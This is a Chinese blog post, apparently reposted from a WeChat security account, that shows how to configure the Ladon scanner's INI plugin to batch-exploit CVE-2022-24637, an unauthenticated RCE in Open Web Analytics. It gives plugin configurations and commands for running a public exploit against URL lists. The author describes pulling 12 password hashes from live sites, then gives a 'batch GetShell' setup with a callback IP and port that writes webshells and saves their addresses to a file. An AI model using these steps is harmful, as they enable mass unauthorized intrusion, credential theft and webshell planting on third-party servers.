本文主要教大家如何配置Ladon的INI插件,实现快速批量验证POC。该漏洞除了练手或提交SRC,可能没什么用,OWA登陆界面如下
Ladon插件 CVE-2022-24637.ini
INI插件最大的优势在于,可调用任意语言编写的POC,就是说在没有源码的情况下也可以,只要知道如何使用POC,然后填写参数,设置URL变量或IP变量即可。当别人放出POC时,我们只需要验证出一个成功的,即可Ladon批量
[Ladon]
exe=python
arg=CVE-2022-24637.py $ip$ -c
log=true
批量命令
Ladon url.txt cve-2022-24637
由于本地没搭有环境,EXP也是github上找的,并不知道成功是怎样的,所以没有重定向,先让Ladon跑一些URL,成功如上图所示,检测出漏洞时同时返回密码HASH,当然也有一些有漏洞但无法获取HASH的。重定向后,稍等一分钟,就自动获取了12个密码。
查看密码对应URL,再使用EXP写入webshell
批量GetShell配置
[Ladon]
exe=python
arg=CVE-2022-24637.py $ip$ -i 123.123.123.123 -p 4444 -u admin
log=true
webshell是随机地址,我们可以重定向输出结果
Ladon url.txt GetShell.ini > shell.txt
PS: 与Ladon联动的最佳Poc为.net编写的程序或DLL,可使用LadonEXP一键生成大部份WEB相关POC,非WEB洞需自己编写。
POC: https://www.exploit-db.com/exploits/51026
相关文章
Ladon9.3.0 & CobaltStrike & Exchange ProxyShell漏洞复现
Ladon 9.2.1 Cisco漏洞复现批量GetShell、IIS后门、指纹识别、CMS识别
LadonExp教程CVE-2022–21661 WordPress漏洞复现
原文始发于微信公众号(K8实验室):CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论